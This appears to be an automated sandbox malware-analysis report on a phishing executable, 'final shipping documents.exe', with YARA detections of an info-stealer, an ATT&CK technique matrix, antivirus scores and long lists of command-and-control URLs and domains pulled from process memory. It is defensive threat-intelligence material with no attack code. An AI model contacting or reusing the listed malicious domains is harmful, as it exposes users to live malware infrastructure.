Source: Yara match	File source: 9.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.1560987932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2972448445.0000000004C80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2791031634.0000000000EA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1505929112.0000000003CD7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1572083824.0000000003BE5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.1649367924.00000000024E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2972399366.0000000004C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1505929112.0000000003EF4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected PureLog Stealer

Source: Yara match	File source: 0.2.final shipping documents.exe.30b1678.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.final shipping documents.exe.6fe0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.final shipping documents.exe.6fe0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.GcrdXwPgmZ.exe.2da160c.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.GcrdXwPgmZ.exe.2da160c.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.final shipping documents.exe.30b1678.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.final shipping documents.exe.2e8f86c.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.GcrdXwPgmZ.exe.2b7f800.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1508959820.0000000006FE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1567368332.0000000002A77000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1504736152.0000000002CDC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	512 Process Injection	1 Masquerading	OS Credential Dumping	441 Security Software Discovery	Remote Services	1 Archive Collected Data	12 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Shared Modules	1 DLL Side-Loading	1 Scheduled Task/Job	11 Disable or Modify Tools	LSASS Memory	2 Process Discovery	Remote Desktop Protocol	Data from Removable Media	4 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	Logon Script (Windows)	1 Abuse Elevation Control Mechanism	171 Virtualization/Sandbox Evasion	Security Account Manager	171 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 DLL Side-Loading	512 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	14 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 System Network Configuration Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Abuse Elevation Control Mechanism	Cached Domain Credentials	1 System Network Connections Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	4 Obfuscated Files or Information	DCSync	1 File and Directory Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	2 Software Packing	Proc Filesystem	212 System Information Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 DLL Side-Loading	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Link
final shipping documents.exe	51%	Virustotal	Browse
final shipping documents.exe	42%	ReversingLabs
final shipping documents.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\GcrdXwPgmZ.exe	42%	ReversingLabs

Source	Detection	Scanner	Label
http://www.1fuli9902.shop/a03d/www.oonlightshadow.shop	100%	Avira URL Cloud	malware
https://powerpoint.office.comer3	0%	Avira URL Cloud	safe
http://www.aja168e.live/a03d/www.voyagu.info	100%	Avira URL Cloud	malware
http://www.orld-visa-center.online/a03d/	100%	Avira URL Cloud	malware
http://www.voyagu.infoReferer:	0%	Avira URL Cloud	safe
http://www.argloscaremedia.info	0%	Avira URL Cloud	safe
http://www.5970.pizza/a03d/	100%	Avira URL Cloud	malware
http://www.avid-hildebrand.info/a03d/	100%	Avira URL Cloud	malware
http://www.cebepu.info	0%	Avira URL Cloud	safe
http://www.ategorie-polecane-831.buzzReferer:	0%	Avira URL Cloud	safe
http://www.lsaadmart.store	0%	Avira URL Cloud	safe
http://www.encortex.beauty	0%	Avira URL Cloud	safe
http://www.lsaadmart.store/a03d/www.duxrib.xyz	100%	Avira URL Cloud	malware
http://ns.adobeom/xap/1.0/sTy	0%	Avira URL Cloud	safe
http://www.ategorie-polecane-831.buzz/a03d/www.yselection.xyz	100%	Avira URL Cloud	malware
http://www.eepvid.xyz/a03d/www.atidiri.fun	100%	Avira URL Cloud	malware
www.enelog.xyz/a03d/	100%	Avira URL Cloud	malware
http://www.enelog.xyz/a03d/	100%	Avira URL Cloud	malware
http://www.aja168e.liveReferer:	0%	Avira URL Cloud	safe
http://www.avid-hildebrand.infoReferer:	0%	Avira URL Cloud	safe
http://www.atidiri.fun/a03d/	100%	Avira URL Cloud	malware
http://www.erpangina-treatment-views.sbsReferer:	0%	Avira URL Cloud	safe
http://www.avid-hildebrand.info/a03d/www.enelog.xyz	100%	Avira URL Cloud	malware
http://www.otelhafnia.info/a03d/	100%	Avira URL Cloud	malware
http://www.romatografia.online/a03d/www.ome-renovation-86342.bond	100%	Avira URL Cloud	malware
http://www.ategorie-polecane-831.buzz	0%	Avira URL Cloud	safe
http://www.voyagu.info/a03d/www.orld-visa-center.online	100%	Avira URL Cloud	malware
http://www.agfov4u.xyz/a03d/	100%	Avira URL Cloud	malware
http://www.argloscaremedia.infoReferer:	0%	Avira URL Cloud	safe
http://www.otelhafnia.info	0%	Avira URL Cloud	safe
http://www.ings-hu-13.todayReferer:	0%	Avira URL Cloud	safe
http://www.argloscaremedia.info/a03d/	100%	Avira URL Cloud	malware
http://www.aja168e.live	0%	Avira URL Cloud	safe
http://www.5970.pizzaReferer:	0%	Avira URL Cloud	safe
http://www.enelog.xyz/a03d/www.lsaadmart.store	100%	Avira URL Cloud	malware
http://www.erpangina-treatment-views.sbs/a03d/www.ings-hu-13.today	100%	Avira URL Cloud	malware
http://www.alata.xyz/a03d/	100%	Avira URL Cloud	malware
http://www.kkkk.shop	100%	Avira URL Cloud	malware
http://www.enelog.xyz/a03d/www.erpangina-treatment-views.sbs	100%	Avira URL Cloud	malware
http://www.atidiri.fun	0%	Avira URL Cloud	safe
http://www.yselection.xyzReferer:	0%	Avira URL Cloud	safe
http://www.ome-renovation-86342.bond/a03d/	100%	Avira URL Cloud	malware
http://www.ings-hu-13.today	0%	Avira URL Cloud	safe
http://www.romatografia.online/a03d/	100%	Avira URL Cloud	malware
http://www.1fuli9902.shop	0%	Avira URL Cloud	safe
http://www.ome-renovation-86342.bond/a03d/www.ategorie-polecane-831.buzz	100%	Avira URL Cloud	malware
http://www.5970.pizza/a03d/www.eepvid.xyz	100%	Avira URL Cloud	malware
http://www.ome-renovation-86342.bond	0%	Avira URL Cloud	safe
http://www.ings-hu-13.today/a03d/	100%	Avira URL Cloud	malware
http://www.elnqdjc.shop	0%	Avira URL Cloud	safe
http://www.kkkk.shop/a03d/	100%	Avira URL Cloud	malware
http://www.eepvid.xyz/a03d/www.alata.xyz	100%	Avira URL Cloud	malware
http://www.alata.xyz/a03d/www.enelog.xyz	100%	Avira URL Cloud	malware
http://www.agfov4u.xyz/a03d/www.leurdivin.online	100%	Avira URL Cloud	malware
http://www.alata.xyzReferer:	0%	Avira URL Cloud	safe
http://www.leurdivin.online	0%	Avira URL Cloud	safe
http://www.encortex.beauty/a03d/	100%	Avira URL Cloud	malware
http://www.voyagu.info	0%	Avira URL Cloud	safe
http://www.lsaadmart.storeReferer:	0%	Avira URL Cloud	safe
http://www.voyagu.info/a03d/	100%	Avira URL Cloud	malware
http://www.yselection.xyz	0%	Avira URL Cloud	safe
http://www.otelhafnia.infoReferer:	0%	Avira URL Cloud	safe
http://www.mmarketing.xyzReferer:	0%	Avira URL Cloud	safe
http://www.haoyun.websiteReferer:	0%	Avira URL Cloud	safe
http://www.enelog.xyzReferer:	0%	Avira URL Cloud	safe
http://www.agfov4u.xyz	0%	Avira URL Cloud	safe
http://www.oonlightshadow.shop	0%	Avira URL Cloud	safe
http://www.otelhafnia.info/a03d/www.kkkk.shop	100%	Avira URL Cloud	malware
http://www.ings-hu-13.today/a03d/www.agfov4u.xyz	100%	Avira URL Cloud	malware
http://www.duxrib.xyz/a03d/	100%	Avira URL Cloud	malware
http://www.atidiri.fun/a03d/www.elnqdjc.shop	100%	Avira URL Cloud	malware
http://www.leurdivin.online/a03d/www.romatografia.online	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
bg.microsoft.map.fastly.net	199.232.214.172	true	false	high
haoyunforever.github.io	185.199.108.153	true	true	unknown
www.haoyun.website	unknown	unknown	true	unknown
www.avid-hildebrand.info	unknown	unknown	true	unknown
www.mmarketing.xyz	unknown	unknown	true	unknown
api.msn.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
www.enelog.xyz/a03d/	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.1fuli9902.shop/a03d/www.oonlightshadow.shop	explorer.exe, 0000000A.00000002.2475682494.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271195240.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.argloscaremedia.info	explorer.exe, 0000001A.00000002.3123251512.0000000009304000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.0000000009304000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.aja168e.live/a03d/www.voyagu.info	explorer.exe, 0000001A.00000002.3123251512.0000000009304000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.0000000009304000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.orld-visa-center.online/a03d/	explorer.exe, 0000001A.00000003.2566723323.0000000009304000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://powerpoint.office.comer3	explorer.exe, 0000001A.00000003.2566723323.0000000009336000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.voyagu.infoReferer:	explorer.exe, 0000001A.00000002.3123251512.0000000009304000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.0000000009304000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.5970.pizza/a03d/	explorer.exe, 0000001A.00000002.3123251512.0000000009304000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.0000000009304000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.ategorie-polecane-831.buzzReferer:	explorer.exe, 0000000A.00000002.2475682494.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271195240.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.cebepu.info	explorer.exe, 0000001A.00000002.3123251512.0000000009304000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.0000000009304000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.msn.com:443/v1/news/Feed/Windows?t	explorer.exe, 0000000A.00000002.2462603390.0000000007276000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1488122672.0000000007276000.00000004.00000001.00020000.00000000.sdmp	false		high
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV	explorer.exe, 0000000A.00000002.2462603390.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1488122672.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2460644880.0000000004BD3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.3107310888.0000000004BD3000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.avid-hildebrand.info/a03d/	explorer.exe, 0000001A.00000002.3123251512.0000000009304000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.0000000009304000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world	explorer.exe, 0000000A.00000002.2462603390.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1488122672.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2460644880.0000000004BD3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.3107310888.0000000004BD3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.msn.com:443/v1/news/Feed/Windows?	explorer.exe, 0000000A.00000002.2462603390.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1488122672.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2460644880.0000000004BD3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.000000000919A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.3107310888.0000000004BD3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.3123251512.000000000919F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.msn.com/en-us/weather/topstories/here-s-who-could-see-above-average-snowfall-this-winter	explorer.exe, 0000000A.00000002.2462603390.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1488122672.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2460644880.0000000004BD3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.3107310888.0000000004BD3000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.lsaadmart.store/a03d/www.duxrib.xyz	explorer.exe, 0000001A.00000002.3123251512.0000000009304000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.0000000009304000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.lsaadmart.store	explorer.exe, 0000001A.00000002.3123251512.0000000009304000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.0000000009304000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://excel.office.com	explorer.exe, 0000000A.00000002.2473557488.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1509179829.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.000000000923A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-	explorer.exe, 0000000A.00000002.2462603390.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1488122672.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2460644880.0000000004BD3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.3107310888.0000000004BD3000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.duxrib.xyzReferer:	explorer.exe, 0000000A.00000002.2475682494.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271195240.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.3123251512.0000000009304000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.0000000009304000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.aja168e.liveReferer:	explorer.exe, 0000001A.00000002.3123251512.0000000009304000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.0000000009304000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.ategorie-polecane-831.buzz/a03d/www.yselection.xyz	explorer.exe, 0000000A.00000002.2475682494.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271195240.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.encortex.beauty	explorer.exe, 0000001A.00000002.3123251512.0000000009304000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.0000000009304000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.eepvid.xyz/a03d/www.atidiri.fun	explorer.exe, 0000001A.00000002.3123251512.0000000009304000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.0000000009304000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://ns.adobeom/xap/1.0/sTy	explorer.exe, 0000001A.00000003.2468240857.0000000004FF2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.avid-hildebrand.infoReferer:	explorer.exe, 0000001A.00000002.3123251512.0000000009304000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.0000000009304000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.enelog.xyz/a03d/	explorer.exe, 0000000A.00000002.2475682494.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271195240.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.3123251512.0000000009304000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.0000000009304000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.erpangina-treatment-views.sbsReferer:	explorer.exe, 0000000A.00000002.2475682494.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271195240.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.msn.com/v1/news/Feed/Windows?activityId=DD4083B70FE54739AB05D6BBA3484042&timeOut=5000&oc	explorer.exe, 0000000A.00000002.2462603390.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1488122672.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2460644880.0000000004BD3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.3107310888.0000000004BD3000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.atidiri.fun/a03d/	explorer.exe, 0000001A.00000002.3123251512.0000000009304000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.0000000009304000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://wns.windows.com/	explorer.exe, 0000000A.00000003.2272841023.00000000090F2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1505638874.00000000090F2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2466417228.00000000090F2000.00000004.00000001.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	final shipping documents.exe, 00000000.00000002.1504736152.0000000002CDC000.00000004.00000800.00020000.00000000.sdmp, GcrdXwPgmZ.exe, 0000000B.00000002.1567368332.00000000029CC000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.avid-hildebrand.info/a03d/www.enelog.xyz	explorer.exe, 0000001A.00000002.3123251512.0000000009304000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.0000000009304000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.romatografia.online/a03d/www.ome-renovation-86342.bond	explorer.exe, 0000000A.00000002.2475682494.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271195240.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.agfov4u.xyz/a03d/	explorer.exe, 0000000A.00000002.2475682494.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271195240.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.ategorie-polecane-831.buzz	explorer.exe, 0000000A.00000002.2475682494.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271195240.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.otelhafnia.info/a03d/	explorer.exe, 0000001A.00000002.3123251512.0000000009304000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.0000000009304000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.argloscaremedia.infoReferer:	explorer.exe, 0000001A.00000002.3123251512.0000000009304000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.0000000009304000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.voyagu.info/a03d/www.orld-visa-center.online	explorer.exe, 0000001A.00000002.3123251512.0000000009304000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.0000000009304000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.otelhafnia.info	explorer.exe, 0000001A.00000002.3123251512.0000000009304000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.0000000009304000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.ings-hu-13.todayReferer:	explorer.exe, 0000000A.00000002.2475682494.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271195240.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.5970.pizzaReferer:	explorer.exe, 0000001A.00000002.3123251512.0000000009304000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.0000000009304000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.argloscaremedia.info/a03d/	explorer.exe, 0000001A.00000002.3123251512.0000000009304000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.0000000009304000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://word.office.com	explorer.exe, 0000000A.00000002.2473557488.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1509179829.000000000C091000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.aja168e.live	explorer.exe, 0000001A.00000002.3123251512.0000000009304000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.0000000009304000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.atidiri.fun	explorer.exe, 0000001A.00000002.3123251512.0000000009304000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.0000000009304000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.enelog.xyz/a03d/www.lsaadmart.store	explorer.exe, 0000001A.00000002.3123251512.0000000009304000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.0000000009304000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.erpangina-treatment-views.sbs/a03d/www.ings-hu-13.today	explorer.exe, 0000000A.00000002.2475682494.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271195240.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings	explorer.exe, 0000001A.00000002.3107310888.0000000004BD3000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.kkkk.shop	explorer.exe, 0000001A.00000002.3123251512.0000000009304000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2566723323.0000000009304000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.alata.xyz/a03d/	explorer.exe, 0000000A.00000002.2475682494.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271195240.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.enelog.xyz/a03d/www.erpangina-treatment-views.sbs	explorer.exe, 0000000A.00000002.2475682494.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271195240.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark	explorer.exe, 0000000A.00000002.2462603390.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1488122672.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2460644880.0000000004BD3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.3107310888.0000000004BD3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew	explorer.exe, 0000000A.00000002.2462603390.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1488122672.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001A.00000003.2460644880.0000000004BD3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.3107310888.0000000004BD3000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.ings-hu-13.today	explorer.exe, 0000000A.00000002.2475682494.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271195240.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.yselection.xyzReferer:	explorer.exe, 0000000A.00000002.2475682494.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271195240.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://outlook.com	explorer.exe, 0000000A.00000002.2473557488.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1509179829.000000000C091000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.ome-renovation-86342.bond/a03d/	explorer.exe, 0000000A.00000002.2475682494.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2271195240.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
